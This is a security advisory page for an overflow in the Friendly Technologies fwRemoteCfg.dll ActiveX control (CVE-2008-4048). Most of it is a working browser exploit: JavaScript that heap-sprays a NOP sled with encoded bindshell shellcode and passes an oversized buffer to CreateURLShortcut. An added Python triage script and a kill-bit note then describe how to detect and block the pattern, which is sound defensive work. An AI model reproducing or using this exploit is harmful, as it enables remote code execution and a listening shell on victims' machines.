Details : SecurityAlert

  Topic : Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
  SecurityAlert : 4242
  CVE : CVE-2008-4048
  CWE : CWE-119
  SecurityRisk : Medium
  Remote Exploit : Yes
  Local Exploit : No
  Victim interaction required : No
  Exploit Given : Yes
  Credit : spdr.
  Published : 14.09.2008

  Affected Software : friendly_technologies:friendly_pppoe_client:3.0.0.57



  Advisory Text :  

<!--
"Friendly Technologies" provides software like L2TP and PPPoE clients to
ISPs, who give the software to their customers on CD so they have less
trouble setting up their connections.
They also provide remote configuration solutions .. not the best idea if
you ask me.

An overflow exists in fwRemoteCfg.dll provided with the dialer,
an example of the dialer can be found here:

==========================================================
|| Greetz to the binaryvision crew ||
|| Come visit @ http://www.binaryvision.org.il ||
|| or IRC at irc.nix.co.il / #binaryvision ||
==========================================================

* Tested on WinXP SP2 using IE6.
** For Education ONLY!
*** Written by spdr. (spdr01 [at] gmail.com)
-->

<html>
<title>Friendly Technologies - wayyy too friendly...</title>

<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B"
id="sucker"></object>
<input type="button" value="Exploit!"

<script>
function exploit() {
  var Evil = "";                    // Our Evil Buffer
  var DamnIE = "\x0C\x0C\x0C\x0C";  // Damn IE changes address when not in the 0x00 - 0x7F range :(
  // Need to use heap spray rather than overwrite EIP ...

  // Skyland win32 bindshell (28876/tcp) shellcode
  // (one %u-encoded string, split with + purely for line length)
  var ShellCode = unescape(
    "%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u012" +
    "0%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u" +
    "75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5" +
    "e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u" +
    "6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc58" +
    "9%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u" +
    "50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u355" +
    "0%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%u" +
    "c031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc65" +
    "6%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u" +
    "3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u545" +
    "3%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%u" +
    "c031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec" +
    "2%uffff%uc483%u615c%u89eb");

  var payLoadSize = ShellCode.length * 2;  // Size of the shellcode in bytes
  var SprayToAddress = 0x0C0C0C0C;         // Spray up to there, could make it shorter.

  var spraySlide = unescape("%u9090%u9090");  // Nop slide
  var heapHdrSize = 0x38;                     // size of heap header blocks in MSIE, hopefully.
  var BlockSize = 0x100000;                   // Size of each block
  var SlideSize = BlockSize - (payLoadSize + heapHdrSize);  // Size of the Nop slide
  var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks

  spraySlide = MakeNopSlide(spraySlide, SlideSize);  // Create our slide

  // [heap header][nopslide][shellcode]
  var memory = new Array();
  for (var k = 0; k < heapBlocks; k++)
    memory[k] = spraySlide + ShellCode;

  // Create Evil Buffer
  while (Evil.length < 800)
    Evil += "A";
  Evil += DamnIE;

  // Pwn
  sucker.CreateURLShortcut("con", "con", Evil, 1);  // Using 'con' as filename, we dont really want to make a file.
}

function MakeNopSlide(spraySlide, SlideSize) {
  // Double the slide until it is long enough, then trim to SlideSize bytes
  while (spraySlide.length * 2 < SlideSize)
    spraySlide += spraySlide;
  spraySlide = spraySlide.substring(0, SlideSize / 2);
  return spraySlide;
}
</script>

</html>
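The exploit above depends on two things a defender can look for in captured web content: the fwRemoteCfg.dll control being instantiated from a page by its CLSID, and a heap spray (a %u-encoded unescape blob, a %u9090 NOP sled, and a filler string grown in a loop) feeding an oversized argument to one of the control's methods. The Python script below is an added triage example written for this page; it is not part of the SecurityReason advisory or of spdr's exploit. It scans HTML/JS text for those indicators and produces a score. The regular expressions, the scoring thresholds and the two sample pages are assumptions chosen for illustration; the "suspect" sample reuses only the structure of the exploit and fills its unescape blob with %u4141 placeholder tokens, not shellcode.

```python
"""Static triage of HTML/JS for the fwRemoteCfg.dll ActiveX exploit pattern.

Added example for this page (not from the advisory or its author). The
CLSID is the one the advisory shows; everything else is an assumption.
"""
import re
from dataclasses import dataclass, field

# CLSID of the vulnerable fwRemoteCfg.dll control, taken from the advisory.
FWREMOTECFG_CLSID = "F4A06697-C0E7-4BB6-8C3B-E01016A4408B"

# Indicator patterns (assumed heuristics, tuned to the exploit's structure).
RE_OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
RE_ATTR_CLSID = re.compile(r'classid\s*=\s*"clsid:([0-9a-f-]+)"', re.I)
RE_ATTR_ID = re.compile(r'\bid\s*=\s*"(\w+)"', re.I)
RE_PERCENT_U = re.compile(r"%u[0-9a-f]{4}", re.I)      # one %u-encoded word
RE_NOP_SLED = re.compile(r"(?:%u9090){2,}", re.I)      # x86 NOP sled in %u form
RE_FILLER = re.compile(r"while\s*\(\s*(\w+)\.length\s*<\s*(\d+)\s*\)")

BLOB_TOKEN_THRESHOLD = 32   # assumed: shellcode blobs are far longer than UI strings
FILLER_THRESHOLD = 256      # assumed: filler loops past this size are suspicious


@dataclass
class Triage:
    clsid_match: bool = False
    object_ids: list = field(default_factory=list)
    percent_u_tokens: int = 0
    nop_sled: bool = False
    filler_loops: list = field(default_factory=list)   # (variable, target length)
    activex_calls: list = field(default_factory=list)  # (object id, method)
    score: int = 0
    verdict: str = "likely benign"


def triage(html: str) -> Triage:
    """Collect indicators from one page and score them."""
    t = Triage()
    # 1. Embedded <object> tags: note their ids and whether the CLSID matches.
    for tag in RE_OBJECT_TAG.findall(html):
        clsid = RE_ATTR_CLSID.search(tag)
        obj_id = RE_ATTR_ID.search(tag)
        if obj_id:
            t.object_ids.append(obj_id.group(1))
        if clsid and clsid.group(1).upper() == FWREMOTECFG_CLSID:
            t.clsid_match = True
    # 2. Heap-spray signs: size of %u-encoded data and a NOP sled.
    t.percent_u_tokens = len(RE_PERCENT_U.findall(html))
    t.nop_sled = RE_NOP_SLED.search(html) is not None
    # 3. Filler loops that grow a string past the threshold.
    t.filler_loops = [(v, int(n)) for v, n in RE_FILLER.findall(html)
                      if int(n) >= FILLER_THRESHOLD]
    # 4. Script calls into the embedded objects (e.g. sucker.CreateURLShortcut).
    for obj_id in t.object_ids:
        for m in re.finditer(r"\b%s\.(\w+)\s*\(" % re.escape(obj_id), html):
            t.activex_calls.append((obj_id, m.group(1)))
    # Weighted score: the CLSID alone is notable, the spray pattern confirms it.
    t.score = ((2 if t.clsid_match else 0)
               + int(t.nop_sled)
               + int(t.percent_u_tokens >= BLOB_TOKEN_THRESHOLD)
               + int(bool(t.filler_loops))
               + int(bool(t.activex_calls) and t.clsid_match))
    t.verdict = "suspicious" if t.score >= 3 else "likely benign"
    return t


# Constructed sample mirroring the exploit's structure; %u4141 is filler, not shellcode.
SUSPECT_PAGE = '''<html>
<object classid="clsid:f4a06697-c0e7-4bb6-8c3b-e01016a4408b"
id="sucker"></object>
<script>
var ShellCode = unescape("''' + "%u4141" * 40 + '''");
var spraySlide = unescape("%u9090%u9090");
var Evil = "";
while(Evil.length < 800)
  Evil += "A";
sucker.CreateURLShortcut("con", "con", Evil, 1);
</script>
</html>'''

# Constructed benign sample: a short unescape and a small loop, no ActiveX object.
BENIGN_PAGE = '''<html>
<script>
var greeting = unescape("%u0048%u0069"); // "Hi"
var items = [];
while(items.length < 10) items.push(items.length);
</script>
</html>'''

if __name__ == "__main__":
    for name, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        print(name, triage(page))
```

Run the file directly to triage the two built-in samples, or call triage() on the text of a captured page. On the host side, the standard mitigation for a scriptable control like this one is the Internet Explorer kill bit: a DWORD named "Compatibility Flags" set to 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F4A06697-C0E7-4BB6-8C3B-E01016A4408B} prevents IE from instantiating the control. That is Microsoft's general kill-bit mechanism applied to the CLSID from this advisory, not a step the advisory itself describes.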



  References :

http://xforce.iss.net/xforce/xfdb/44755
http://www.securityfocus.com/bid/30891
http://www.milw0rm.com/exploits/6323
http://secunia.com/advisories/31644



  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.